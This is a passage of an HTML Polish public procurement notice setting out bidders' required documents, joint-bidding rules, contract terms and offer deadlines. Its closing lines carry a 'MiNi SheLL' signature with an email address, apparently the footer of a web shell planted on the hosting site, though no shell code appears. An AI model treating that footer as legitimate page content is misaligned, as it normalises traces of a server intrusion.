warunków udziału w postępowaniu nastąpi na podstawie złożonych przez Wykonawcę oświadczeń i dokumentów, zgodnie z rozdziałem VII SWZ. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">1.5 Odpis lub informacja z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i Informacji o Działalności Gospodarczej, w zakresie art. 109 ust. 1 pkt 4 ustawy Pzp, sporządzone nie wcześniej niż 3 miesiące przed ich złożeniem, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">7.1.Wykaz oświadczeń i dokumentów: <br/>DOKUMENTY SKŁADANE WRAZ Z OFERTĄW CELU DOKONANIA OCENY, IŻ WYKONAWCA NIE PODLEGA WYKLUCZENIU ORAZ POTWIERDZENIA, ŻE WYKONAWCA SPEŁNIA WARUNKI UDZIAŁU W POSTĘPOWANIU OPISANE PRZEZ ZAMAWIAJĄCEGO WYKONAWCA SKŁADA NASTĘPUJĄCE DOKUMENTY TYMCZASOWO ZASTĘPUJĄCE WYMAGANE PRZEZ ZAMAWIAJĄCEGO PODMIOTOWE ŚRODKI DOWODOWE (W PRZYPADKU WSPÓLNEGO UBIEGANIA SIĘ O UDZIELENIE ZAMÓWIENIA DOKUMENTY SKŁADA KAŻDY Z WYKONAWCÓW):<br/>1.1 Oświadczenie o braku podstaw do wykluczenia i spełnianiu warunków udziału w postępowaniu – Załącznik nr 2 do SWZ DOKUMENTY NIEZBĘDNE DLA PRZEPROWADZENIA POSTĘPOWANIA, KTÓRE WYKONAWCA SKŁADA WRAZ Z OFERTĄ:<br/>1.2 Wypełniony Formularz Oferty - załącznik nr 1 do SWZ wraz z Formularzem cenowym zbiorczym – załącznik nr 3 do SWZ<br/>1.3 Pełnomocnictwo (pełnomocnictwo powinno zostać przedłożone jako oryginał w postaci elektronicznej opatrzonej kwalifikowanym podpisem elektronicznym, podpisem zaufanym lub podpisem osobistym, bądź kopii potwierdzonej za zgodność z oryginałem przez notariusza, przy czym potwierdzenie za zgodność z oryginałem odbywa się wówczas za pomocą kwalifikowanego podpisu elektronicznego, podpisu zaufanego lub osobistego notariusza, do reprezentowania Wykonawcy w tym do podpisania oferty, jeśli upoważnienie do reprezentowania Wykonawcy nie wynika bezpośrednio z innych dokumentów załączonych do oferty. Jeśli upoważnienie do reprezentowania Wykonawcy wynika z innych dokumentów, Wykonawca załącza je do oferty, chyba, że Zamawiający może te dokumenty uzyskać w szczególności za pomocą bezpłatnych i ogólnodostępnych baz danych, w szczególności rejestrów publicznych w rozumieniu ustawy z dnia 17 lutego 2005 r. o informatyzacji działalności podmiotów realizujących zadania publiczne ( Dz.U. z 2021 poz. 670 ze zm.).<br/>1.4 Wykonawca, który polega na zdolnościach lub sytuacji podmiotów udostępniających zasoby w oparciu o art. 118 ustawy Pzp, składa wraz z ofertą, zobowiązanie podmiotu udostępniającego zasoby do oddania mu do dyspozycji niezbędnych zasobów na potrzeby realizacji danego zamówienia lub inny podmiotowy środek dowodowy potwierdzający, że Wykonawca realizując zamówienie, będzie dysponował niezbędnymi zasobami tych podmiotów.</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> nie dotyczy <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> 1.1 Oświadczenie o braku podstaw do wykluczenia i spełnianiu warunków udziału w postępowaniu – Załącznik nr 2 do SWZ DOKUMENTY NIEZBĘDNE DLA PRZEPROWADZENIA POSTĘPOWANIA, KTÓRE WYKONAWCA SKŁADA WRAZ Z OFERTĄ:<br/>1.2 Wypełniony Formularz Oferty - załącznik nr 1 do SWZ wraz z Formularzem cenowym zbiorczym – załącznik nr 3 do SWZ<br/>1.3 Pełnomocnictwo (pełnomocnictwo powinno zostać przedłożone jako oryginał w postaci elektronicznej opatrzonej kwalifikowanym podpisem elektronicznym, podpisem zaufanym lub podpisem osobistym, bądź kopii potwierdzonej za zgodność z oryginałem przez notariusza, przy czym potwierdzenie za zgodność z oryginałem odbywa się wówczas za pomocą kwalifikowanego podpisu elektronicznego, podpisu zaufanego lub osobistego notariusza, do reprezentowania Wykonawcy w tym do podpisania oferty, jeśli upoważnienie do reprezentowania Wykonawcy nie wynika bezpośrednio z innych dokumentów załączonych do oferty. Jeśli upoważnienie do reprezentowania Wykonawcy wynika z innych dokumentów, Wykonawca załącza je do oferty, chyba, że Zamawiający może te dokumenty uzyskać w szczególności za pomocą bezpłatnych i ogólnodostępnych baz danych, w szczególności rejestrów publicznych w rozumieniu ustawy z dnia 17 lutego 2005 r. o informatyzacji działalności podmiotów realizujących zadania publiczne ( Dz.U. z 2021 poz. 670 ze zm.).<br/>1.4 Wykonawca, który polega na zdolnościach lub sytuacji podmiotów udostępniających zasoby w oparciu o art. 118 ustawy Pzp, składa wraz z ofertą, zobowiązanie podmiotu udostępniającego zasoby do oddania mu do dyspozycji niezbędnych zasobów na potrzeby realizacji danego zamówienia lub inny podmiotowy środek dowodowy potwierdzający, że Wykonawca realizując zamówienie, będzie dysponował niezbędnymi zasobami tych podmiotów. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim przypadku Wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo do reprezentowania w postępowaniu i do zawarcia umowy w sprawie zamówienia publicznego. <br/>9.2. Z pełnomocnictwa musi jednoznacznie wynikać umocowanie do reprezentowania wszystkich Wykonawców wspólnie ubiegających się o udzielenie zamówienia w przedmiotowym postępowaniu. <br/>9.3. Przepisy dotyczące Wykonawcy stosuje się odpowiednio do Wykonawców wspólnie ubiegających się o udzielenie zamówienia. <br/>9.4. W przypadku wspólnego ubiegania się o zamówienie przez Wykonawców oświadczenie, o którym mowa w rozdziale VII pkt 7.1 ppkt 1 nin. SWZ składa każdy z Wykonawców wspólnie ubiegających się o zamówienie. Oświadczenie to potwierdzać ma spełnianie warunków udziału w postępowaniu oraz brak podstaw do wykluczenia w zakresie, w którym każdy z Wykonawców wykazuje spełnianie warunków udziału w postępowaniu oraz brak podstaw do wykluczenia. Wymagane dokumenty potwierdzające brak podstaw do wykluczenia składa każdy z Wykonawców. <br/>9.5. Przedsiębiorców prowadzących działalność w formie spółki cywilnej, na gruncie ustawy Prawo zamówień publicznych należy traktować jako Wykonawców wspólnie ubiegających się o udzielenie zamówienia. <br/>9.6. Wszelkie oświadczenia podmiotów składających ofertę wspólnie oraz podmiotów udostępniających potencjał powinny mieć formę dokumentu elektronicznego, podpisanego kwalifikowanym podpisem elektronicznym, podpisem zaufanym lub podpisem osobistym przez każdego z nich w zakresie w jakim potwierdzają okoliczności, o których mowa w treści art. 57oraz art. 117 ust. 3 i 4 ustawy Pzp. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zamawiający przewiduje możliwość zmiany zawartej umowy w stosunku do treści wybranej oferty w zakresie uregulowanym w art. 454-455 Pzp oraz wskazanym w Projekcie Umowy, stanowiącym załącznik nr 3 do SWZ. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2022-03-30 14:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Wykonawca składa ofertę za pośrednictwem Formularza do złożenia, zmiany, wycofania oferty lub wniosku dostępnego na ePUAP https://epuap.gov.pl/wps/portal i udostępnionego również na miniPortalu https://miniportal.uzp.gov.pl/.</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2022-03-30 14:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2022-04-30</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com